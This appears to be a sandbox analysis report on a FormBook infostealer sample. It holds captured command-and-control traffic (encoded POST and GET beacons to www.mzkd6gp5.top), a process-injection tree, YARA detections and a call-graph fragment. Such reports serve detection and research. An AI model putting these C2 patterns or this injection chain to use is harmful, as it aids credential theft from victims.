                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOlxFpRyH296IizPNQlSLUy2hO3Pl39IMyl%2FSWzgwbBXYVZr%2BegyCwIvurCcv%2BUDMNN3zUJQyxYuOBW0C1OGxIFttFwy0L%2FDTipon24y9w9FfZ5jZm8g0Yps4tfqvUYUDQP%2F"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22cdf9d87d0e-EWR
                                            Content-Encoding: gzip
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=802&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                            Jan 10, 2025 17:45:11.259059906 CET5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.450010104.21.80.1802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:45:12.942863941 CET822OUTPOST /0hqe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.mzkd6gp5.top
                                            Origin: http://www.mzkd6gp5.top
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 223
                                            Referer: http://www.mzkd6gp5.top/0hqe/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 69 5a 69 4d 46 63 64 61 66 51 52 33 34 7a 4a 75 6e 56 78 44 55 6c 6c 72 77 2b 4f 6c 70 59 4a 58 6e 34 44 50 6c 71 33 52 6a 31 69 51 30 63 66 70 77 31 67 57 73 30 6a 68 4b 6f 6b 64 59 6e 48 4e 4e 42 6e 36 6a 30 6d 53 71 41 64 51 58 69 74 2f 35 43 48 6a 56 59 42 69 6a 6d 4f 6c 63 6f 2b 4a 71 70 39 31 64 38 56 55 4d 51 65 55 75 63 72 46 38 73 4b 58 63 78 69 7a 77 73 45 66 30 4f 73 6d 34 30 58 51 38 76 56 6d 6b 37 38 6d 38 65 6c 37 41 58 6f 4a 75 31 42 49 7a 65 6a 58 35 33 47 44 71 77 58 63 41 46 6e 69 6d 32 57 72 73 68 32 56 4f 54 6a 75 78 54 65 6f 6e 76 30 4e 44 43 47 61 39 4d 48 73 4c 4d 50 52 37 2b 45 3d
                                            Data Ascii: h0Z4uv=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYJXn4DPlq3Rj1iQ0cfpw1gWs0jhKokdYnHNNBn6j0mSqAdQXit/5CHjVYBijmOlco+Jqp91d8VUMQeUucrF8sKXcxizwsEf0Osm40XQ8vVmk78m8el7AXoJu1BIzejX53GDqwXcAFnim2Wrsh2VOTjuxTeonv0NDCGa9MHsLMPR7+E=
                                            Jan 10, 2025 17:45:13.878002882 CET966INHTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:13 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BSiuZvHVQdQzd0pOY1uvF7RLdUWTO9zkP8mUnXKVc5PnnqMf7IZZ0ZXdiPSJ%2FxpO9smrLnXZiBCmR3GNLXRWcIThfuHJ0f5Vu%2FmH6mqEaoDioYJOs3l0ODf0Q37Ttft4uPoW"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22de482f42d2-EWR
                                            Content-Encoding: gzip
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.450011104.21.80.1802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:45:15.486999035 CET10904OUTPOST /0hqe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.mzkd6gp5.top
                                            Origin: http://www.mzkd6gp5.top
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 10303
                                            Referer: http://www.mzkd6gp5.top/0hqe/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 69 5a 69 4d 46 63 64 61 66 51 52 33 34 7a 4a 75 6e 56 78 44 55 6c 6c 72 77 2b 4f 6c 70 59 42 58 6b 4b 37 50 71 70 66 52 69 31 69 51 2b 38 66 6f 77 31 67 50 73 31 4c 6c 4b 6f 59 4e 59 6b 76 4e 4d 69 66 36 33 57 43 53 6b 41 64 51 4b 53 74 38 30 69 48 32 56 59 52 6d 6a 6d 65 6c 63 6f 2b 4a 71 6f 4e 31 4c 64 56 55 4f 51 65 54 70 63 72 7a 34 73 4b 72 63 31 32 4a 77 73 41 51 30 2f 4d 6d 34 55 6e 51 2b 61 68 6d 37 4c 38 67 76 75 6c 64 41 58 30 57 75 31 73 33 7a 65 2b 36 35 31 61 44 36 58 53 5a 62 30 48 54 31 46 79 69 73 68 4f 33 4a 68 61 74 6f 41 75 75 76 76 49 44 54 54 75 78 6d 2b 43 69 66 70 53 54 75 6f 75 77 74 45 6d 6a 67 79 79 78 66 63 79 38 5a 76 35 75 55 4b 38 76 67 7a 51 32 38 50 2f 6c 64 38 70 6f 44 6d 42 6e 71 4d 6f 43 55 63 54 67 71 47 6a 53 50 2f 48 72 34 71 73 52 79 4f 65 31 75 2b 52 69 43 46 32 68 42 54 67 2f 72 75 4d 31 59 31 7a 71 39 71 37 78 47 5a 30 75 54 79 59 30 33 57 71 34 37 38 39 49 55 69 69 53 53 48 32 76 6b 6b 33 69 61 4f 59 [TRUNCATED]
                                            Data Ascii: h0Z4uv=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYBXkK7PqpfRi1iQ+8fow1gPs1LlKoYNYkvNMif63WCSkAdQKSt80iH2VYRmjmelco+JqoN1LdVUOQeTpcrz4sKrc12JwsAQ0/Mm4UnQ+ahm7L8gvuldAX0Wu1s3ze+651aD6XSZb0HT1FyishO3JhatoAuuvvIDTTuxm+CifpSTuouwtEmjgyyxfcy8Zv5uUK8vgzQ28P/ld8poDmBnqMoCUcTgqGjSP/Hr4qsRyOe1u+RiCF2hBTg/ruM1Y1zq9q7xGZ0uTyY03Wq4789IUiiSSH2vkk3iaOYd/6Ae9s8wzFSFoEASw6R9T+6kW7SdteHhAZjMnE0HOwgOt9VMLbT65DjZnWhGyVL4bGtOVznvTfPIvpSmESmtiTC5eGzCGwsLNFwl28ZjTt8rmREI/0CChhS190/Via62meujIxBhgyTJdN+y8P+LN6SjfTr1TZvkilC0Fj8iCd0eSUWhFzv2M3s0Uq7IacCAkjg3NMF6pnu4zNECxqNtU/sT5ucvN35x146DKSvpgJo19uBqsZTh/ERaL4DdLLIPJ1jacSsf60ljxpRyaIwaG9PEeNz7sTl9g8F0yXprWe3dOjSftPtdty2MGc69lFEtydvsi6Q1GIbu//zUuA5a2jcKbZn+iFbju6iDBEeFWueaOUPTD8DcYKC6ckT2EKO9+QEEcEHDlX7hf0nFRnLKM7o6RXl48yvLQUjT4wEuXSS2we5JpaA37AAXVtdnpHokhEAFL9WNsAMhRCws+pxbxK9DNrWmCZxvd7vW9l+F/0mIenAhCsH2s9Faaji1FSXwC53yqW+EFuuJ0uVq0M3ljLMqtmtJV/9VjFbf4gr/WlTviaWvFYxyQSzL70Xf+MQD/IaSrzETwK/5Y24Z5W4Hc/JsZ5mmAO3y3Gv74ltHj8xaeZaRfARUleFdkR0yA/fDzFOunX3RgkpVzsaPokegmYZWXqL7SnHsu [TRUNCATED]
                                            Jan 10, 2025 17:45:16.475223064 CET970INHTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:16 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrZZp2tDNMoTseK6nSnDiJTFQaFn%2Fo3cDfrQKiXcvKT2dzH37rHp1mgSFGgNXzWZqITT42gafw%2BNBCdbFaG6yHSYnWSJHiObD6NBdg7LSwIee0iGNpvKaPR21vgg3XZp0Vi%2B"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22eecacf43ee-EWR
                                            Content-Encoding: gzip
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=34229&min_rtt=34229&rtt_var=17114&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10904&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                            Jan 10, 2025 17:45:16.476088047 CET5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.450012104.21.80.1802056C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 10, 2025 17:45:18.031637907 CET533OUTGET /0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.mzkd6gp5.top
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Jan 10, 2025 17:45:18.946753025 CET1236INHTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:18 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2ASWDf1zmEQ5OpbBMi5%2BQOuPlgyojZg1ufAF95wZ71HzGnpDMC1DHkQLy2%2Bgrf0uPNELC44iiEURriAHZd9Pc0IgObhRhruoZJ%2BHCDbEvqjm5ygOxvhFiPZ4SjEXGVudrNY"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22fe3ae443ee-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=533&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                            Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                            Jan 10, 2025 17:45:18.946773052 CET90INData Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d
                                            Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:11:43:17
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\qlG7x91YXH.exe"
                                            Imagebase:0xd70000
                                            File size:782'336 bytes
                                            MD5 hash:29E38E8C57AEA7A49657E5960D12F3E9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:11:43:20
                                            Start date:10/01/2025
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\qlG7x91YXH.exe"
                                            Imagebase:0x4c0000
                                            File size:46'504 bytes
                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:11:44:00
                                            Start date:10/01/2025
                                            Path:C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe"
                                            Imagebase:0x8a0000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:11:44:02
                                            Start date:10/01/2025
                                            Path:C:\Windows\SysWOW64\ROUTE.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                            Imagebase:0x4c0000
                                            File size:19'456 bytes
                                            MD5 hash:C563191ED28A926BCFDB1071374575F1
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:7
                                            Start time:11:44:15
                                            Start date:10/01/2025
                                            Path:C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe"
                                            Imagebase:0x8a0000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:8
                                            Start time:11:44:28
                                            Start date:10/01/2025
                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0x7ff6bf500000
                                            File size:676'768 bytes
                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.3%
                                              Dynamic/Decrypted Code Coverage:0.4%
                                              Signature Coverage:6.5%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:43
                                              execution_graph 95447 da90fa 95448 da911f 95447->95448 95449 da9107 95447->95449 95453 da917a 95448->95453 95461 da9117 95448->95461 95506 dafdc4 21 API calls 2 library calls 95448->95506 95504 d9f2d9 20 API calls _abort 95449->95504 95451 da910c 95505 da27ec 26 API calls _abort 95451->95505 95467 d9d955 95453->95467 95456 da9192 95474 da8c32 95456->95474 95458 da9199 95459 d9d955 __fread_nolock 26 API calls 95458->95459 95458->95461 95460 da91c5 95459->95460 95460->95461 95462 d9d955 __fread_nolock 26 API calls 95460->95462 95463 da91d3 95462->95463 95463->95461 95464 d9d955 __fread_nolock 26 API calls 95463->95464 95465 da91e3 95464->95465 95466 d9d955 __fread_nolock 26 API calls 95465->95466 95466->95461 95468 d9d961 95467->95468 95469 d9d976 95467->95469 95507 d9f2d9 20 API calls _abort 95468->95507 95469->95456 95471 d9d966 95508 da27ec 26 API calls _abort 95471->95508 95473 d9d971 95473->95456 95475 da8c3e ___BuildCatchObject 95474->95475 95476 da8c5e 95475->95476 95477 da8c46 95475->95477 95479 da8d24 95476->95479 95483 da8c97 95476->95483 95575 d9f2c6 20 API calls _abort 95477->95575 95582 d9f2c6 20 API calls _abort 95479->95582 95480 da8c4b 95576 d9f2d9 20 API calls _abort 95480->95576 95486 da8cbb 95483->95486 95487 da8ca6 95483->95487 95484 da8d29 95583 d9f2d9 20 API calls _abort 95484->95583 95485 da8c53 __fread_nolock 95485->95458 95509 da5147 RtlEnterCriticalSection 95486->95509 95577 d9f2c6 20 API calls _abort 95487->95577 95491 da8cab 95578 d9f2d9 20 API calls _abort 95491->95578 95492 da8cc1 95493 da8cdd 95492->95493 95494 da8cf2 95492->95494 95579 d9f2d9 20 API calls _abort 95493->95579 95510 da8d45 95494->95510 95499 da8cb3 95584 da27ec 26 API calls _abort 95499->95584 95500 da8ce2 95580 d9f2c6 20 API calls _abort 95500->95580 95501 da8ced 95581 da8d1c RtlLeaveCriticalSection __wsopen_s 95501->95581 95504->95451 95505->95461 95506->95453 95507->95471 95508->95473 95509->95492 95511 da8d6f 95510->95511 95512 da8d57 95510->95512 95514 da90d9 95511->95514 95519 da8db4 95511->95519 95594 d9f2c6 20 API calls _abort 95512->95594 95616 d9f2c6 20 API calls _abort 95514->95616 95515 da8d5c 95595 d9f2d9 20 API calls _abort 95515->95595 95518 da90de 95617 d9f2d9 20 API calls _abort 95518->95617 95520 da8d64 95519->95520 95522 da8dbf 95519->95522 95526 da8def 95519->95526 95520->95501 95596 d9f2c6 20 API calls _abort 95522->95596 95523 da8dcc 95618 da27ec 26 API calls _abort 95523->95618 95525 da8dc4 95597 d9f2d9 20 API calls _abort 95525->95597 95529 da8e08 95526->95529 95530 da8e4a 95526->95530 95531 da8e2e 95526->95531 95529->95531 95535 da8e15 95529->95535 95601 da3820 21 API calls 2 library calls 95530->95601 95598 d9f2c6 20 API calls _abort 95531->95598 95534 da8e33 95599 d9f2d9 20 API calls _abort 95534->95599 95585 daf89b 95535->95585 95536 da8e61 95602 da29c8 95536->95602 95540 da8fb3 95543 da9029 95540->95543 95547 da8fcc GetConsoleMode 95540->95547 95541 da8e3a 95600 da27ec 26 API calls _abort 95541->95600 95542 da8e6a 95545 da29c8 _free 20 API calls 95542->95545 95546 da902d ReadFile 95543->95546 95548 da8e71 95545->95548 95549 da90a1 GetLastError 95546->95549 95550 da9047 95546->95550 95547->95543 95551 da8fdd 95547->95551 95553 da8e7b 95548->95553 95554 da8e96 95548->95554 95555 da90ae 95549->95555 95556 da9005 95549->95556 95550->95549 95557 da901e 95550->95557 95551->95546 95552 da8fe3 ReadConsoleW 95551->95552 95552->95557 95558 da8fff GetLastError 95552->95558 95608 d9f2d9 20 API calls _abort 95553->95608 95610 da9424 28 API calls __fread_nolock 95554->95610 95614 d9f2d9 20 API calls _abort 95555->95614 95572 da8e45 __fread_nolock 95556->95572 95611 d9f2a3 20 API calls __dosmaperr 95556->95611 95566 da906c 95557->95566 95567 da9083 95557->95567 95557->95572 95558->95556 95559 da29c8 _free 20 API calls 95559->95520 95564 da8e80 95609 d9f2c6 20 API calls _abort 95564->95609 95565 da90b3 95615 d9f2c6 20 API calls _abort 95565->95615 95612 da8a61 31 API calls 2 library calls 95566->95612 95571 da909a 95567->95571 95567->95572 95613 da88a1 29 API calls __fread_nolock 95571->95613 95572->95559 95574 da909f 95574->95572 95575->95480 95576->95485 95577->95491 95578->95499 95579->95500 95580->95501 95581->95485 95582->95484 95583->95499 95584->95485 95586 daf8a8 95585->95586 95587 daf8b5 95585->95587 95619 d9f2d9 20 API calls _abort 95586->95619 95589 daf8c1 95587->95589 95620 d9f2d9 20 API calls _abort 95587->95620 95589->95540 95591 daf8e2 95621 da27ec 26 API calls _abort 95591->95621 95592 daf8ad 95592->95540 95594->95515 95595->95520 95596->95525 95597->95523 95598->95534 95599->95541 95600->95572 95601->95536 95603 da29d3 RtlFreeHeap 95602->95603 95604 da29fc __dosmaperr 95602->95604 95603->95604 95605 da29e8 95603->95605 95604->95542 95622 d9f2d9 20 API calls _abort 95605->95622 95607 da29ee GetLastError 95607->95604 95608->95564 95609->95572 95610->95535 95611->95572 95612->95572 95613->95574 95614->95565 95615->95572 95616->95518 95617->95523 95618->95520 95619->95592 95620->95591 95621->95592 95622->95607 95623 d72e37 95702 d7a961 95623->95702 95627 d72e6b 95721 d73a5a 95627->95721 95629 d72e7f 95728 d79cb3 95629->95728 95634 d72ead 95756 d7a8c7 95634->95756 95635 db2cb0 95776 de2cf9 95635->95776 95637 db2cc3 95638 db2ccf 95637->95638 95802 d74f39 95637->95802 95643 d74f39 68 API calls 95638->95643 95641 d72ec3 95760 d76f88 22 API calls 95641->95760 95646 db2ce5 95643->95646 95644 d72ecf 95645 d79cb3 22 API calls 95644->95645 95647 d72edc 95645->95647 95808 d73084 22 API calls 95646->95808 95761 d7a81b 41 API calls 95647->95761 95649 d72eec 95652 d79cb3 22 API calls 95649->95652 95651 db2d02 95809 d73084 22 API calls 